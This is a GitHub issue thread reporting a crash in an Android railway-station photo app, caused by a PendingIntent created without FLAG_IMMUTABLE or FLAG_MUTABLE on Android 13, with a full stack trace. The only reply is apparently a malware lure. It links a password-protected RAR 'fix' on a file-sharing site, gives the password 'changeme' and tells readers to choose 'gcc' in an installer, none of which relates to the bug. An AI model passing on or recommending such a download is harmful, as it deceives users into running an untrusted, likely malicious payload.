### ISSUE TITLE
Crash when clicking on nearby notification 

### ISSUE THREAD

**Issue by pstorch** [RailwayStations/RSAndroidApp#516]
### App information
* ID: de.bahnhoefe.deutschlands.bahnhofsfotos
* Version: 91 15.2.0

### Device information
* Brand: samsung
* Device: y2s
* Model: SM-G985F
* Id: TP1A.220624.014
* Product: y2seea

### Firmware
* SDK: 33
* Release: 13
* Incremental: G985FXXSKHXEA

### Cause of error
```java
Exception in thread "Thread-3": java.lang.IllegalArgumentException: de.bahnhoefe.deutschlands.bahnhofsfotos: Targeting S+ (version 31 and above) requires that one of FLAG_IMMUTABLE or FLAG_MUTABLE be specified when creating a PendingIntent.
Strongly consider using FLAG_IMMUTABLE, only use FLAG_MUTABLE if some functionality depends on the PendingIntent being mutable, e.g. if it needs to be used with inline replies or bubbles.
	at android.app.PendingIntent.checkFlags(PendingIntent.java:408)
	at android.app.PendingIntent.getActivitiesAsUser(PendingIntent.java:631)
	at android.app.PendingIntent.getActivities(PendingIntent.java:613)
	at android.app.TaskStackBuilder.getPendingIntent(TaskStackBuilder.java:275)
	at android.app.TaskStackBuilder.getPendingIntent(TaskStackBuilder.java:249)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.notification.NearbyBahnhofNotificationManager.pendifyMe(NearbyBahnhofNotificationManager.kt:101)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.notification.NearbyBahnhofNotificationManager.createDetailPendingIntent(NearbyBahnhofNotificationManager.kt:117)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.notification.NearbyBahnhofNotificationManager.createBasicNotificationBuilder(NearbyBahnhofNotificationManager.kt:59)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.notification.NearbyBahnhofWithPhotoNotificationManager.onBitmapAvailable(NearbyBahnhofWithPhotoNotificationManager.kt:46)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapCache.getPhoto$lambda$2$lambda$1$lambda$0(BitmapCache.kt:53)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapCache.$r8$lambda$54Hros30h9cEJPOF5PTeRfhQqBM(Unknown Source:0)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapCache$$ExternalSyntheticLambda1.accept(Unknown Source:4)
	at java.util.ArrayList.forEach(ArrayList.java:1528)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapCache.getPhoto$lambda$2(BitmapCache.kt:52)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapCache.$r8$lambda$CLe7tzD5ephuUto0AXKzSIXvJhE(Unknown Source:0)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapCache$$ExternalSyntheticLambda0.onBitmapAvailable(Unknown Source:4)
	at de.bahnhoefe.deutschlands.bahnhofsfotos.util.BitmapDownloader.run(BitmapDownloader.kt:41)

```

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
